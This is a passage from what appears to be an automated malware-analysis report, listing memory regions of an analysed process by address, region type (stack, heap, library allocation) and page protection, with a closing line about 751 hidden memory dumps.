stack
|
page read and write
|
||
|
2178F0D8000
|
trusted library allocation
|
page read and write
|
||
|
2178C107000
|
heap
|
page read and write
|
||
|
1FC96280000
|
trusted library allocation
|
page read and write
|
||
|
217A5F90000
|
heap
|
page execute and read and write
|
||
|
49B56FE000
|
stack
|
page read and write
|
||
|
1BD73C50000
|
heap
|
page read and write
|
||
|
219DF950000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB10000
|
trusted library allocation
|
page read and write
|
||
|
4F5F28D000
|
stack
|
page read and write
|
||
|
1FC964E5000
|
heap
|
page read and write
|
||
|
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
|
1BD00089000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
2178BF00000
|
heap
|
page read and write
|
||
|
219DDBC3000
|
heap
|
page read and write
|
||
|
1E22AC1F000
|
trusted library allocation
|
page read and write
|
||
|
49B427E000
|
unkown
|
page readonly
|
||
|
219DDAA0000
|
heap
|
page read and write
|
||
|
219EFAE1000
|
trusted library allocation
|
page read and write
|
||
|
219E1115000
|
trusted library allocation
|
page read and write
|
||
|
1FC96280000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC64A000
|
trusted library allocation
|
page read and write
|
||
|
1FC90D13000
|
heap
|
page read and write
|
||
|
1FC9644F000
|
heap
|
page read and write
|
||
|
3D30AFF000
|
stack
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
B56D2BB000
|
stack
|
page read and write
|
||
|
7FFAACAD0000
|
trusted library allocation
|
page read and write
|
||
|
1E22A6F0000
|
trusted library allocation
|
page read and write
|
||
|
217A6289000
|
heap
|
page read and write
|
||
|
1BD75610000
|
trusted library section
|
page read and write
|
||
|
7FFAAC92C000
|
trusted library allocation
|
page execute and read and write
|
||
|
219DDCC6000
|
heap
|
page read and write
|
||
|
3D30DFE000
|
stack
|
page read and write
|
||
|
217A6080000
|
heap
|
page read and write
|
||
|
B56CCFD000
|
stack
|
page read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FC90CAF000
|
heap
|
page read and write
|
||
|
A351E7D000
|
stack
|
page read and write
|
||
|
7FFAAC662000
|
trusted library allocation
|
page read and write
|
||
|
1BD75DE0000
|
heap
|
page read and write
|
||
|
32AC0FF000
|
stack
|
page read and write
|
||
|
2178C145000
|
heap
|
page read and write
|
||
|
1FC96110000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB50000
|
trusted library allocation
|
page read and write
|
||
|
1FC96442000
|
heap
|
page read and write
|
||
|
B56CD7E000
|
stack
|
page read and write
|
||
|
7FFAAC7E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB60000
|
trusted library allocation
|
page read and write
|
||
|
219F7CB1000
|
heap
|
page read and write
|
||
|
219E0715000
|
trusted library allocation
|
page read and write
|
||
|
1DD68DD0000
|
heap
|
page read and write
|
||
|
1E22A7D1000
|
trusted library allocation
|
page read and write
|
||
|
32ABEFD000
|
stack
|
page read and write
|
||
|
1BD73CFF000
|
heap
|
page read and write
|
||
|
1BD75780000
|
heap
|
page execute and read and write
|
||
|
1BD75680000
|
heap
|
page read and write
|
||
|
1BD75660000
|
heap
|
page readonly
|
||
|
93C17FE000
|
stack
|
page read and write
|
||
|
1FC90CAA000
|
heap
|
page read and write
|
||
|
4F5E27F000
|
stack
|
page read and write
|
||
|
1BD73D27000
|
heap
|
page read and write
|
||
|
1FC91340000
|
trusted library allocation
|
page read and write
|
||
|
32AC07E000
|
stack
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA90000
|
trusted library allocation
|
page read and write
|
||
|
2178D970000
|
trusted library allocation
|
page read and write
|
||
|
1FC90C78000
|
heap
|
page read and write
|
||
|
1FC961B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC63A000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC790000
|
trusted library allocation
|
page read and write
|
||
|
219F7C73000
|
heap
|
page read and write
|
||
|
1E22A6B1000
|
trusted library allocation
|
page read and write
|
||
|
4F5E539000
|
stack
|
page read and write
|
||
|
49B397E000
|
stack
|
page read and write
|
||
|
7FFB1E4B0000
|
unkown
|
page readonly
|
||
|
B56D03D000
|
stack
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
12F1C319000
|
heap
|
page read and write
|
||
|
7FFAAC493000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACBA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC872000
|
trusted library allocation
|
page read and write
|
||
|
1FC964BE000
|
heap
|
page read and write
|
||
|
1E22A510000
|
heap
|
page read and write
|
||
|
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E4D5000
|
unkown
|
page readonly
|
||
|
1FC96770000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB00000
|
trusted library allocation
|
page read and write
|
||
|
1FC90BD0000
|
heap
|
page read and write
|
||
|
1EC73BE8000
|
heap
|
page read and write
|
||
|
B56D1B8000
|
stack
|
page read and write
|
||
|
3F19E79000
|
stack
|
page read and write
|
||
|
7FFAAC54C000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F5DCF5000
|
stack
|
page read and write
|
||
|
93C16FE000
|
stack
|
page read and write
|
||
|
4F5E43E000
|
stack
|
page read and write
|
||
|
4F5E0FE000
|
stack
|
page read and write
|
||
|
1FC91400000
|
heap
|
page read and write
|
||
|
219DDB00000
|
heap
|
page read and write
|
||
|
7FFAAC880000
|
trusted library allocation
|
page read and write
|
||
|
1FC90C00000
|
heap
|
page read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
|
1FC90BB0000
|
heap
|
page read and write
|
||
|
1E2289F0000
|
heap
|
page read and write
|
||
|
19D580A0000
|
heap
|
page read and write
|
||
|
1E228A29000
|
heap
|
page read and write
|
||
|
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
|
32AC1FE000
|
stack
|
page read and write
|
||
|
1BD75740000
|
heap
|
page execute and read and write
|
||
|
1BD75F3D000
|
heap
|
page read and write
|
||
|
1FC90C97000
|
heap
|
page read and write
|
||
|
7FFAAC4EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD0011E000
|
trusted library allocation
|
page read and write
|
||
|
49B517E000
|
unkown
|
page readonly
|
||
|
7FFAAC660000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC64A000
|
trusted library allocation
|
page read and write
|
There are 751 hidden memdumps, click here to show them.